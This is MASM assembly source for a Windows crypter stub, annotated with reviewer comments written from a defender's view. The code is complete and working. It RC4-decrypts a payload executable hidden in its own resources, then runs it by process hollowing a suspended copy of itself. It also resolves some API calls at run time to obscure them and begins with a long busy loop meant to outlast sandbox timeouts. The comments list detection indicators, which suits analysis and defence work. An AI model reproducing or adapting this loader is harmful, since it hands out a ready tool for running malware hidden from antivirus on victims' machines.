;Compiled with MASM
;-----------------------------------------------------------------------
; Reviewer notes (defender's reading of this listing)
;
; 32-bit MASM, flat model, stdcall. The listing was recovered with its
; line breaks collapsed; statements are restored one per line below and
; no instruction, operand or directive has been altered.
;
; What the file does: it RC4-decrypts an RCDATA resource (id 1212) of the
; running executable with a key `password`, then runs the decrypted PE by
; process hollowing a CREATE_SUSPENDED copy of this same executable:
;   GetModuleFileName(self) -> CreateProcess(self, CREATE_SUSPENDED)
;   -> GetThreadContext -> ZwUnmapViewOfSection(child, own image base)
;   -> VirtualAllocEx(child, payload ImageBase, SizeOfImage, RWX)
;   -> WriteProcessMemory(headers, then each section)
;   -> SetThreadContext(EAX = payload entry point) -> ResumeThread
; That API sequence is the canonical process-hollowing indicator. The
; points most detection logic keys on are visible here: a suspended child
; whose image is the parent itself, an RWX allocation at the payload's
; preferred ImageBase, NtUnmapViewOfSection from user code, and a
; ~500,000,000-iteration busy loop before any API is touched. The
; decrypted payload stays in place in the parent's own resource mapping
; (ResInf), so a memory dump of the parent recovers it.
;
; Symbols not declared in this listing (rc4keytable, mPath, hInstance,
; temp, find1..find4, password, ResInf, hResourceSize, loop_stopper)
; presumably come from 123.inc, which is not on the page.
;-----------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\ntdll.inc
include 123.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\ntdll.lib
.code

;-----------------------------------------------------------------------
; Rc4_setkey(Pass, LenPass) -- RC4 key schedule (KSA)
; ABI:   stdcall; every register is preserved via pushad/popad
; In:    Pass    = pointer to key bytes
;        LenPass = key length in bytes
; Out:   rc4keytable (256-byte state, declared outside this listing)
;        holds the scheduled permutation
; Regs:  cl = i (0..255), al = j, ebx = key index (bl only, so it wraps
;        at 256 bytes), esi = key bytes left in the current pass,
;        edi = Pass, dl/dh = swap temporaries
; Note:  LenPass = 0 is not handled: `dec esi` wraps to 0FFFFFFFFh, so
;        the schedule keeps reading bytes past Pass until i wraps.
;-----------------------------------------------------------------------
Rc4_setkey proc Pass:DWORD, LenPass:DWORD
        pushad
        ; Identity init S[i] = i, four bytes per store, top down:
        ; 0FFFEFDFCh at [252..255], then -04040404h per step down to
        ; 03020100h at [0..3] (little-endian). Leaves ecx = 0 = i.
        mov     eax, 0FFFEFDFCh
        mov     ecx, 256/4
Init_rc4keytable:
        mov     dword ptr [rc4keytable+4*ecx-4], eax
        sub     eax, 04040404h
        dec     ecx
        jnz     Init_rc4keytable
        xor     eax, eax                        ; j = 0 (al is the index, high bytes stay 0)
        mov     edi, Pass
Key_return:                                     ; restart the key from byte 0
        xor     ebx, ebx
        mov     esi ,LenPass
        jmp     New_key
Key_loop:
        inc     bl                              ; next key byte
        dec     esi
        jz      Key_return                      ; key exhausted -> wrap
New_key:
        mov     dl, byte ptr [rc4keytable+ecx]  ; dl = S[i]
        add     al, byte ptr [edi+ebx]          ; j += key[k]
        add     al, dl                          ; j += S[i]
        mov     dh, byte ptr [rc4keytable+eax]  ; dh = S[j]
        mov     byte ptr [rc4keytable+ecx], dh  ; S[i] = S[j]
        mov     byte ptr [rc4keytable+eax], dl  ; S[j] = old S[i]
        inc     cl                              ; i++; cl wraps to 0 after index 255
        jnz     Key_loop
        popad
        ret
Rc4_setkey endp

;-----------------------------------------------------------------------
; Rc4_crypt(iData, LenData) -- RC4 keystream XOR in place (PRGA)
; ABI:   stdcall; every register is preserved via pushad/popad
; In:    iData   = buffer to (de)crypt in place
;        LenData = byte count
; Out:   buffer xored with the keystream derived from rc4keytable
; Regs:  bl = i, al = j, esi = data pointer, edi = bytes remaining,
;        dl/cl = temporaries
; Side effect: after a non-empty pass the 256-byte state is zeroed with
;        rep stosd, so each Rc4_setkey serves exactly one Rc4_crypt and
;        the final RC4 state is not left in memory. The LenData = 0 exit
;        skips that wipe.
;-----------------------------------------------------------------------
Rc4_crypt proc iData:DWORD, LenData:DWORD
        pushad
        mov     edi, LenData
        mov     esi, iData
        test    edi, edi
        jz      Rc4_enc_exit                    ; nothing to do (state is NOT wiped on this path)
        xor     eax, eax                        ; j = 0
        xor     edx, edx
        xor     ecx, ecx
        xor     ebx, ebx                        ; i = 0
Rc4_enc_loop:
        inc     bl                              ; i++
        mov     dl, byte ptr [rc4keytable+ebx]  ; dl = S[i]
        add     al, dl                          ; j += S[i]
        mov     cl, byte ptr [rc4keytable+eax]  ; cl = S[j]
        mov     byte ptr [rc4keytable+ebx], cl  ; S[i] = S[j]
        mov     byte ptr [rc4keytable+eax], dl  ; S[j] = old S[i]   (swap done)
        add     cl, dl                          ; cl = S[i] + S[j]
        mov     cl, byte ptr [rc4keytable+ecx]  ; keystream byte K = S[cl]
        xor     byte ptr [esi], cl              ; *p ^= K
        inc     esi
        dec     edi
        jnz     Rc4_enc_loop
        ; Wipe the 256-byte state: 64 dword stores of 0.
        xor     eax, eax
        mov     edi, offset rc4keytable
        mov     ecx, 256/4
        cld
        rep     stosd
Rc4_enc_exit:
        popad
        ret
Rc4_crypt endp

;-----------------------------------------------------------------------
; getadress(module, funcion) -- LoadLibrary(module), then
; GetProcAddress(handle, funcion)
; In:    module  = library name string, funcion = export name string
; Out:   ebx = resolved address (non-standard: ebx is callee-saved under
;        stdcall and is clobbered for the caller); eax still holds the
;        same value on return. Callers below read it from ebx once and
;        from eax twice.
; Note:  the library handle is never released (FreeLibrary is commented
;        out). LoadLibrary/GetProcAddress are reached via push/call on
;        the imported stubs (the masm32 headers presumably map the
;        unsuffixed names to the ANSI imports), so both remain visible
;        in this executable's import table despite the run-time lookup.
;-----------------------------------------------------------------------
getadress proc module:DWORD,funcion:DWORD
        LOCAL fh:HMODULE
        push    module
        call    LoadLibrary
        mov     fh,eax
        push    funcion
        push    fh
        call    GetProcAddress
        mov     ebx,eax                         ; result returned in ebx (and left in eax)
        ;invoke FreeLibrary,fh
        ret
getadress endp

;-----------------------------------------------------------------------
; ExtractFile() -- decrypt resource #1212 and hollow a suspended copy of
; this executable with it (see file header for the full sequence).
; Locals: hResource, sinfo/pinfo for CreateProcess, base = payload image
;        base inside the child, sec = first IMAGE_SECTION_HEADER of the
;        payload, cnt = child main-thread context.
; Three API calls go through addresses resolved by getadress with the
; string pairs find1/find2, find1/find4 and find1/find3 (declared outside
; this listing). Judging by the argument lists and the commented-out
; invoke lines they stand for FindResource, CreateProcess and
; WriteProcessMemory, but only the first and third resolved addresses are
; actually called; CreateProcess is still called through the import.
; On "resource not found" the process exits with code 0; every other
; failure branch simply falls off the end of the .if nest.
;-----------------------------------------------------------------------
ExtractFile proc
        local hResource:dword
        LOCAL sinfo: STARTUPINFO
        LOCAL pinfo: PROCESS_INFORMATION
        LOCAL base: dword
        LOCAL sec: ptr IMAGE_SECTION_HEADER
        LOCAL cnt: CONTEXT
        ; GetModuleFileName(0, mPath, 256): own path -> mPath; this path
        ; is what gets launched suspended below (mPath presumably >= 256 bytes).
        push    256
        push    offset mPath
        push    0
        call    GetModuleFileName
        push    0
        call    GetModuleHandle
        mov     hInstance, eax                  ; own image base / HMODULE
        ; Resolve find2 in find1 (result taken from ebx here) and call it as
        ; temp(hInstance, 1212, RT_RCDATA) -- presumably FindResource.
        invoke  getadress,addr find1,addr find2
        mov     temp,ebx
        push    RT_RCDATA
        push    1212
        push    hInstance
        call    temp
        .if eax == 0
                invoke  ExitProcess,0           ; resource missing -> quiet exit
        .else
                mov     hResource, eax
                ;invoke SizeofResource, hInstance, hResource
                push    hResource
                push    hInstance
                call    SizeofResource
                .if eax != 0
                        mov     hResourceSize, eax
                        ;invoke LoadResource, hInstance, hResource
                        push    hResource
                        push    hInstance
                        call    LoadResource
                        ; invoke getadress,find1,find8
                        ;mov temp,ebx
                        ;push hResource
                        ;push hInstance
                        ;call temp
                        .if eax != 0
                                invoke  LockResource, eax
                                mov     ResInf , eax            ; pointer to the encrypted PE in our own .rsrc mapping
                                ; RC4 with key = password (NUL-terminated, length via lstrlen);
                                ; the resource is decrypted in place, so ResInf now points at a
                                ; plaintext PE inside this process.
                                invoke  lstrlen,addr password
                                invoke  Rc4_setkey,addr password,eax
                                invoke  Rc4_crypt,ResInf,hResourceSize
                                invoke  RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
                                ;invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
                                ; find4 is resolved into temp but not used: CreateProcess is
                                ; called directly through the import below.
                                invoke  getadress,find1,find4
                                mov     temp,eax
                                ; CreateProcess(mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, &sinfo, &pinfo):
                                ; a suspended copy of this same executable is the hollowing target.
                                lea     edx,pinfo
                                push    edx
                                lea     edx,sinfo
                                push    edx
                                push    0
                                push    0
                                push    CREATE_SUSPENDED
                                push    0
                                push    0
                                push    0
                                push    0
                                push    offset mPath
                                call    CreateProcess
                                ; Only the integer register group is read back / written later.
                                invoke  RtlZeroMemory, addr cnt, sizeof CONTEXT
                                mov     cnt.ContextFlags, CONTEXT_INTEGER
                                invoke  GetThreadContext, pinfo.hThread, addr cnt
                                ; invoke GetModuleHandle, 0
                                push    0
                                call    GetModuleHandle                 ; eax = OUR image base ...
                                ; invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
                                push    eax
                                push    pinfo.hProcess
                                call    ZwUnmapViewOfSection            ; ... unmapped in the CHILD, i.e. assumes the child copy is mapped at the same base
                                ; edi -> payload IMAGE_NT_HEADERS (ResInf + e_lfanew)
                                mov     edi, ResInf
                                add     edi, IMAGE_DOS_HEADER.e_lfanew[edi]
                                assume  edi: ptr IMAGE_NT_HEADERS
                                ; RWX allocation at the payload's preferred ImageBase inside the child.
                                invoke  VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
                                mov     base, eax
                                ;invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
                                ; Same argument list as the commented-out invoke above, but through
                                ; the address resolved from find1/find3 (taken from eax this time).
                                invoke  getadress,addr find1,addr find3
                                mov     temp,eax
                                push    0
                                push    [edi].OptionalHeader.SizeOfHeaders
                                push    ResInf
                                push    base
                                push    pinfo.hProcess
                                call    temp
                                ; sec = &OptionalHeader + SizeOfOptionalHeader = first section header
                                lea     eax, [edi].OptionalHeader
                                mov     sec, eax
                                movzx   eax, [edi].FileHeader.SizeOfOptionalHeader
                                add     sec, eax
                                xor     eax, eax
                                xor     esi, esi                        ; esi = section index
                                xor     ecx, ecx                        ; zeroed, not used in the loop
                                ; For each section: copy SizeOfRawData bytes from the decrypted
                                ; resource (ResInf + PointerToRawData) to child base + VirtualAddress.
                                .while ( si < [edi].FileHeader.NumberOfSections )
                                        imul    eax, esi, sizeof IMAGE_SECTION_HEADER
                                        add     eax, sec                ; eax -> IMAGE_SECTION_HEADER[esi]
                                        mov     ebx, base
                                        add     ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
                                        mov     edx, ResInf
                                        add     edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
                                        invoke  WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
                                        inc     esi
                                .endw
                                ; The payload entry point is placed in the child thread's EAX
                                ; (EIP is not touched); this presumably relies on the suspended
                                ; thread's start stub transferring control to EAX once resumed.
                                mov     eax, base
                                add     eax, [edi].OptionalHeader.AddressOfEntryPoint
                                mov     cnt.regEax, eax
                                invoke  SetThreadContext, pinfo.hThread, addr cnt
                                invoke  ResumeThread, pinfo.hThread
                                ret
                        .endif
                .endif
        .endif
ExtractFile endp

;-----------------------------------------------------------------------
; Program entry. Spins 500,000,000 iterations of filler work (mov/push/
; pop) before anything else: a pure-CPU delay of this shape is a common
; sandbox-timeout evasion and shows up as a process burning CPU for
; several seconds without touching any API. Note `jg` tests the flags
; left by `dec loop_stopper`, not by the preceding `cmp`, so the loop
; runs until the counter has been decremented to 0.
;-----------------------------------------------------------------------
_entrypoint:
        mov     loop_stopper,500000000
loop_start:
        mov     eax,0
        push    eax
        pop     eax
        cmp     loop_stopper, 0                 ; flags overwritten by the dec below
        dec     loop_stopper
        jg      loop_start
        invoke  ExtractFile
        invoke  ExitProcess, 0
end _entrypoint